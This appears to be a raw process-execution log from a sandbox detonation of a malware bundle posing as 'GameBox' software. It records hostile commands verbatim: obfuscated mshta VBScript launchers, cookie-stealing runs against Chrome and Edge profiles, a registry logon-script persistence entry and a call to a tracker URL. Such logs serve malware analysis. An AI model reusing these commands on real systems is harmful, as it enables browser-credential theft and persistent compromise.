C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 1420 -ip 1420
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 696 -p 3900 -ip 3900
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 724 -p 3244 -ip 3244
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 740 -p 4508 -ip 4508
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3900 -s 296
C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe
"C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3244 -s 236
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1420 -s 296
C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe
"C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SID=717 CID=717 SILENT=1 /quiet
C:\Users\Admin\Documents\X4uQJh2aEqCvnclCc_PZbhYa.exe
"C:\Users\Admin\Documents\X4uQJh2aEqCvnclCc_PZbhYa.exe" -q
C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE
hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS
C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe
"C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe
"C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4508 -s 280
C:\Users\Admin\AppData\Local\Temp\is-OMSLM.tmp\Inlog.tmp
"C:\Users\Admin\AppData\Local\Temp\is-OMSLM.tmp\Inlog.tmp" /SL5="$10360,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe
"C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbScRiPt: CLoSe( crEAteOBJeCt ( "wscrIPt.SHelL" ). RUN("C:\Windows\system32\cmd.exe /c cOPY /y ""C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE"" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF ""-p3auHHA5Pn7qj14hc1xRG9TH8FS "" == """" for %A In (""C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE"" ) do taskkill -f -iM ""%~NxA"" ",0 , TRUE) )
C:\Windows\SysWOW64\taskkill.exe
taskkill -f -iM "E6TRgkpLt1N0zENcY_UZeYQx.exe"
C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe
"C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe"
C:\Users\Admin\AppData\Local\Temp\is-VBCFN.tmp\WEATHER Manager.tmp
"C:\Users\Admin\AppData\Local\Temp\is-VBCFN.tmp\WEATHER Manager.tmp" /SL5="$10374,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
C:\Users\Admin\AppData\Local\Temp\is-L1S5H.tmp\VPN.tmp
"C:\Users\Admin\AppData\Local\Temp\is-L1S5H.tmp\VPN.tmp" /SL5="$10394,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe
"C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Local\Temp\is-MA26D.tmp\MediaBurner2.tmp
"C:\Users\Admin\AppData\Local\Temp\is-MA26D.tmp\MediaBurner2.tmp" /SL5="$502D2,506086,422400,C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe
"C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c cOPY /y "C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE" hBS_VbW.EXE&&StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF "-p3auHHA5Pn7qj14hc1xRG9TH8FS " =="" for %A In ("C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE" ) do taskkill -f -iM "%~NxA"
C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
"C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 4432 -ip 4432
C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe
"C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe"
C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe
"C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 5152 -ip 5152
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4432 -s 272
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5152 -s 296
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Local\Temp\is-2P5HR.tmp\3377047_logo_media.exe
"C:\Users\Admin\AppData\Local\Temp\is-2P5HR.tmp\3377047_logo_media.exe" /S /UID=burnerch2
C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
"C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe" -q
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Roaming\8637498.exe
"C:\Users\Admin\AppData\Roaming\8637498.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 5796 -ip 5796
C:\Users\Admin\AppData\Roaming\3149759.exe
"C:\Users\Admin\AppData\Roaming\3149759.exe"
C:\Users\Admin\AppData\Roaming\5741268.exe
"C:\Users\Admin\AppData\Roaming\5741268.exe"
C:\Users\Admin\AppData\Roaming\7276330.exe
"C:\Users\Admin\AppData\Roaming\7276330.exe"
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
C:\Users\Admin\AppData\Roaming\4990795.exe
"C:\Users\Admin\AppData\Roaming\4990795.exe"
C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 740 -p 4080 -ip 4080
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5796 -s 700
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 748 -p 3252 -ip 3252
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" .\QnEJR.fPC,a
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4080 -s 460
C:\Users\Admin\AppData\Local\Temp\is-PT2V0.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-PT2V0.tmp\Setup.exe" /quiet SILENT=1 AF=715 BF=715
C:\Users\Admin\AppData\Local\Temp\tmp8CCB_tmp.exe
"C:\Users\Admin\AppData\Local\Temp\tmp8CCB_tmp.exe"
C:\Users\Admin\Documents\OdQEgGNiZoEXpervDLKTtxOi.exe
"C:\Users\Admin\Documents\OdQEgGNiZoEXpervDLKTtxOi.exe"
C:\Users\Admin\Documents\CuW5mjlgfninmMpfxqzHkv_b.exe
"C:\Users\Admin\Documents\CuW5mjlgfninmMpfxqzHkv_b.exe"
C:\Users\Admin\Documents\PiE5dvUDUWLiIromDReLQD7J.exe
"C:\Users\Admin\Documents\PiE5dvUDUWLiIromDReLQD7J.exe"
C:\Users\Admin\Documents\3SIzjMcbtGMIkPC0hWFEJsgR.exe
"C:\Users\Admin\Documents\3SIzjMcbtGMIkPC0hWFEJsgR.exe"
C:\Users\Admin\Documents\c02Q0jtD5yxTWwElGoZLhUed.exe
"C:\Users\Admin\Documents\c02Q0jtD5yxTWwElGoZLhUed.exe"
C:\Users\Admin\Documents\WtbsazaWgtDRlV7rGnSpASwZ.exe
"C:\Users\Admin\Documents\WtbsazaWgtDRlV7rGnSpASwZ.exe"
C:\Users\Admin\Documents\nC4tc_PZvdWBmLWn8ZdWpSlo.exe
"C:\Users\Admin\Documents\nC4tc_PZvdWBmLWn8ZdWpSlo.exe"
C:\Users\Admin\Documents\W7m0YvhpQdQsrfQyU7p7q4dI.exe
"C:\Users\Admin\Documents\W7m0YvhpQdQsrfQyU7p7q4dI.exe"
C:\Users\Admin\Documents\kAhUZJb43nELoVFUTwdqKsZm.exe
"C:\Users\Admin\Documents\kAhUZJb43nELoVFUTwdqKsZm.exe"
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\Documents\J1sdQgiASQhk1d_yHnJFHovt.exe
"C:\Users\Admin\Documents\J1sdQgiASQhk1d_yHnJFHovt.exe"
C:\Users\Admin\Documents\YI1cG6E7TWNKv6wgTSb6ZnEL.exe
"C:\Users\Admin\Documents\YI1cG6E7TWNKv6wgTSb6ZnEL.exe"
C:\Users\Admin\Documents\dDP4tjpUeEPe3kHHUjVTbGns.exe
"C:\Users\Admin\Documents\dDP4tjpUeEPe3kHHUjVTbGns.exe"
C:\Users\Admin\Documents\ORctmFkRK26vcfEGBnHO2f5Q.exe
"C:\Users\Admin\Documents\ORctmFkRK26vcfEGBnHO2f5Q.exe"
C:\Users\Admin\Documents\nclr1cLpR76jyJpfSj3Dxr5v.exe
"C:\Users\Admin\Documents\nclr1cLpR76jyJpfSj3Dxr5v.exe"
C:\Users\Admin\Documents\ZHU0dYkH2q9C0Z4CULqdZaIf.exe
"C:\Users\Admin\Documents\ZHU0dYkH2q9C0Z4CULqdZaIf.exe"
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3252 -s 2320
C:\Users\Admin\Documents\sf1Cbiw4pTyZX67Gtp7X6pbZ.exe
"C:\Users\Admin\Documents\sf1Cbiw4pTyZX67Gtp7X6pbZ.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 748 -p 5204 -ip 5204
C:\Users\Admin\AppData\Local\Temp\is-8TCMR.tmp\sf1Cbiw4pTyZX67Gtp7X6pbZ.tmp
"C:\Users\Admin\AppData\Local\Temp\is-8TCMR.tmp\sf1Cbiw4pTyZX67Gtp7X6pbZ.tmp" /SL5="$2023C,138429,56832,C:\Users\Admin\Documents\sf1Cbiw4pTyZX67Gtp7X6pbZ.exe"
C:\Users\Admin\AppData\Local\Temp\is-MRSMD.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-MRSMD.tmp\Setup.exe" /silent /subid=720
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5204 -s 1920
C:\Users\Admin\Documents\nclr1cLpR76jyJpfSj3Dxr5v.exe
C:\Users\Admin\Documents\nclr1cLpR76jyJpfSj3Dxr5v.exe
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Users\Admin\AppData\Local\Temp\is-A8619.tmp\Setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-A8619.tmp\Setup.tmp" /SL5="$204AA,15170975,270336,C:\Users\Admin\AppData\Local\Temp\is-MRSMD.tmp\Setup.exe" /silent /subid=720
C:\Users\Admin\Documents\ZHU0dYkH2q9C0Z4CULqdZaIf.exe
C:\Users\Admin\Documents\ZHU0dYkH2q9C0Z4CULqdZaIf.exe
C:\Users\Admin\AppData\Local\Temp\E849.exe
C:\Users\Admin\AppData\Local\Temp\E849.exe
C:\Users\Admin\Documents\3SIzjMcbtGMIkPC0hWFEJsgR.exe
"C:\Users\Admin\Documents\3SIzjMcbtGMIkPC0hWFEJsgR.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 1856 -ip 1856
C:\Windows\SysWOW64\dllhost.exe
"C:\Windows\System32\dllhost.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 700 -p 6220 -ip 6220
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 6540 -ip 6540
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 1240 -ip 1240
C:\Users\Admin\Documents\W7m0YvhpQdQsrfQyU7p7q4dI.exe
"C:\Users\Admin\Documents\W7m0YvhpQdQsrfQyU7p7q4dI.exe" -q
C:\Users\Admin\Documents\W5t0uEoEk1GRIhtYYmq0uTff.exe
"C:\Users\Admin\Documents\W5t0uEoEk1GRIhtYYmq0uTff.exe"
C:\Users\Admin\Documents\C770YC2B40t9rlyi5QunmqSS.exe
"C:\Users\Admin\Documents\C770YC2B40t9rlyi5QunmqSS.exe"
C:\Users\Admin\Documents\uSjH0U75WJ_KVmP5iAayIRl_.exe
"C:\Users\Admin\Documents\uSjH0U75WJ_KVmP5iAayIRl_.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1856 -s 2456
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6220 -s 292
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 736 -p 6628 -ip 6628
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 728 -p 3404 -ip 3404
C:\Users\Admin\Documents\E_mfWMv0qDLLKpdLmJ3MIQZ0.exe
"C:\Users\Admin\Documents\E_mfWMv0qDLLKpdLmJ3MIQZ0.exe"
C:\Users\Admin\Documents\B4FaSjIIdGGtxVhfMYWaDDEa.exe
"C:\Users\Admin\Documents\B4FaSjIIdGGtxVhfMYWaDDEa.exe"
C:\Users\Admin\Documents\qiwpJkAFgAAbnr8aSGkwzutb.exe
"C:\Users\Admin\Documents\qiwpJkAFgAAbnr8aSGkwzutb.exe"
C:\Users\Admin\Documents\awyt2leQx6ULjCTHfhtR7jhf.exe
"C:\Users\Admin\Documents\awyt2leQx6ULjCTHfhtR7jhf.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c cmd < Eravate.wks
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6540 -s 292
C:\Users\Admin\Documents\PHYhKrBfppymYEgbuZb3eVyh.exe
"C:\Users\Admin\Documents\PHYhKrBfppymYEgbuZb3eVyh.exe"
C:\Users\Admin\AppData\Roaming\1687128.exe
"C:\Users\Admin\AppData\Roaming\1687128.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1240 -s 316
C:\Users\Admin\Documents\rI67ExprUJepuTcOX5cceK3u.exe
"C:\Users\Admin\Documents\rI67ExprUJepuTcOX5cceK3u.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 560 -ip 560
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding F6A6A4CADFCF8031F50FA17405F1BC59 C
C:\Users\Admin\AppData\Roaming\3258184.exe
"C:\Users\Admin\AppData\Roaming\3258184.exe"
C:\Users\Admin\Documents\WtbsazaWgtDRlV7rGnSpASwZ.exe
"C:\Users\Admin\Documents\WtbsazaWgtDRlV7rGnSpASwZ.exe"
C:\Windows\SysWOW64\cmd.exe
cmd
C:\Users\Admin\AppData\Local\Temp\is-QETEV.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-QETEV.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 6428 -ip 6428
C:\Users\Admin\AppData\Roaming\3435026.exe
"C:\Users\Admin\AppData\Roaming\3435026.exe"
C:\Users\Admin\AppData\Local\Temp\6970.exe
C:\Users\Admin\AppData\Local\Temp\6970.exe
C:\Users\Admin\AppData\Local\Temp\is-BJG5E.tmp\Setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-BJG5E.tmp\Setup.tmp" /SL5="$30234,17361482,721408,C:\Users\Admin\AppData\Local\Temp\is-QETEV.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6428 -s 316
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbScRiPt: CLoSe( crEAteOBJeCt ( "wscrIPt.SHelL" ). RUN("C:\Windows\system32\cmd.exe /c cOPY /y ""C:\Users\Admin\Documents\awyt2leQx6ULjCTHfhtR7jhf.exe"" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF """" == """" for %A In (""C:\Users\Admin\Documents\awyt2leQx6ULjCTHfhtR7jhf.exe"" ) do taskkill -f -iM ""%~NxA"" ",0 , TRUE) )
C:\Users\Admin\AppData\Roaming\7736117.exe
"C:\Users\Admin\AppData\Roaming\7736117.exe"
C:\Windows\SysWOW64\findstr.exe
findstr /V /R "^ULDdlRJfZsbrDapCbeEYycZEgRIWBtYuQhzBPWvHncPJJvLmMbGEuHBnMZeapMOUzsjfZIMBGWAJGfVSyolrbxqpLUPQTrnLHUdspcArKyXpiRSvrlhqBKbYsrEtT$" Una.wks
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 3BCA4FF2F037F63343DEE3423973ED24 C
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-91D2C.tmp\{app}\microsoft.cab -F:* %ProgramData%
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c cOPY /y "C:\Users\Admin\Documents\awyt2leQx6ULjCTHfhtR7jhf.exe" hBS_VbW.EXE&&StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF "" =="" for %A In ("C:\Users\Admin\Documents\awyt2leQx6ULjCTHfhtR7jhf.exe" ) do taskkill -f -iM "%~NxA"
C:\Windows\SysWOW64\PING.EXE
ping YJTUIPJF -n 30
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
Esplorarne.exe.com i
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 828 -ip 828
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 5132 -ip 5132
C:\Users\Admin\AppData\Local\Temp\is-IB9PM.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-IB9PM.tmp\Setup.exe" /Verysilent
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner 1.0.0\install\FD7DF1F\Cleaner Installation.msi" SID=717 CID=717 SILENT=1 /quiet AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629403836 SID=717 CID=717 SILENT=1 /quiet " SID="717" CID="717"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 828 -s 276
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5132 -s 288
C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe
"C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" /qn CAMPAIGN="710"
C:\Users\Admin\AppData\Local\Temp\A38C.exe
C:\Users\Admin\AppData\Local\Temp\A38C.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 588 -ip 588
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
tapinstall.exe remove tap0901
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 588 -s 292
C:\Windows\SysWOW64\expand.exe
expand C:\Users\Admin\AppData\Local\Temp\is-91D2C.tmp\{app}\microsoft.cab -F:* C:\ProgramData
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=715 BF=715 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\is-PT2V0.tmp\Setup.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\is-PT2V0.tmp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629403837 /quiet SILENT=1 AF=715 BF=715 " AF="715" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912" BF="715"
C:\Windows\SysWOW64\taskkill.exe
taskkill -f -iM "awyt2leQx6ULjCTHfhtR7jhf.exe"
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 4948 -ip 4948
C:\Program Files\Windows Mail\YUQNUNVYRH\ultramediaburner.exe
"C:\Program Files\Windows Mail\YUQNUNVYRH\ultramediaburner.exe" /VERYSILENT
C:\Users\Admin\AppData\Local\Temp\1f-78e03-5de-60bbb-31a78e895881f\Catyrubaejo.exe
"C:\Users\Admin\AppData\Local\Temp\1f-78e03-5de-60bbb-31a78e895881f\Catyrubaejo.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4948 -s 272
C:\Users\Admin\AppData\Local\Temp\is-29JP7.tmp\ultramediaburner.tmp
"C:\Users\Admin\AppData\Local\Temp\is-29JP7.tmp\ultramediaburner.tmp" /SL5="$305B4,281924,62464,C:\Program Files\Windows Mail\YUQNUNVYRH\ultramediaburner.exe" /VERYSILENT
C:\Users\Admin\AppData\Local\Temp\d2-3311b-f57-6c3b7-7347bf8e37f81\Wuxiwibaegae.exe
"C:\Users\Admin\AppData\Local\Temp\d2-3311b-f57-6c3b7-7347bf8e37f81\Wuxiwibaegae.exe"
C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 560 -p 2576 -ip 2576
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\svrwebui.exe" /f
C:\Users\Admin\AppData\Local\Temp\D4AF.exe
C:\Users\Admin\AppData\Local\Temp\D4AF.exe
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 52E6F96FF560BE24BE65EFF395469ED9
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 2576 -s 2352
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\SysWOW64\reg.exe
reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe" /f
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 1D7FA75AE4E7FBB900B1F3494184279B C
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
tapinstall.exe install OemVista.inf tap0901
C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe
"C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c start http://trecker33442aq.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=74449^¶m=721
C:\Users\Admin\AppData\Local\Temp\is-91D2C.tmp\{app}\vdi_compiler.exe
"C:\Users\Admin\AppData\Local\Temp\is-91D2C.tmp\{app}\vdi_compiler"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s DeviceInstall
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 752 -p 5148 -ip 5148
C:\Windows\system32\DrvInst.exe
DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{74789a1f-439f-0044-8848-b20c17be4268}\oemvista.inf" "9" "4d14a44ff" "0000000000000150" "WinSta0\Default" "0000000000000160" "208" "c:\program files (x86)\maskvpn\driver\win764"
C:\Users\Admin\AppData\Local\Temp\FBE0.exe
C:\Users\Admin\AppData\Local\Temp\FBE0.exe
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5148 -s 2196
C:\Windows\system32\DrvInst.exe
DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oem2.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000150" "5353"
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s NetSetupSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s DsmSvc
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 460 -p 2176 -ip 2176
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 4868 -ip 4868
C:\Users\Admin\AppData\Local\Temp\2717.exe
C:\Users\Admin\AppData\Local\Temp\2717.exe
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 2176 -s 2316
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4868 -s 288
C:\Windows\SysWOW64\msiexec.exe
